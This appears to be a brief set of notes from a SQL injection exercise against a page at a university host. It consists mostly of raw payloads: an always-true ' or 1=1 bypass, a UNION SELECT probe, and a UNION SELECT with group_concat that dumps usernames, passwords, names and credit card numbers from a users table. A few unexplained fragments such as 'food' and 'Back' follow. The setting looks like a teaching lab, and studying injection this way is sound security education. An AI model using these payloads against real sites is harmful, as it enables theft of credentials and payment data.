http://snafu.staff.uod.otago.ac.nz:8080/injection/
// basic injection
' or 1=1;--
// can we exfil data?
'or 1=1 union select 'WOOHOO!' from users order by name desc; --
// get entire users table
'or 1=1 union select group_concat(username||':'||password||':'||name||':'||credit_card) from users as name order by name desc; --
// change color
food
// change back button
food
Back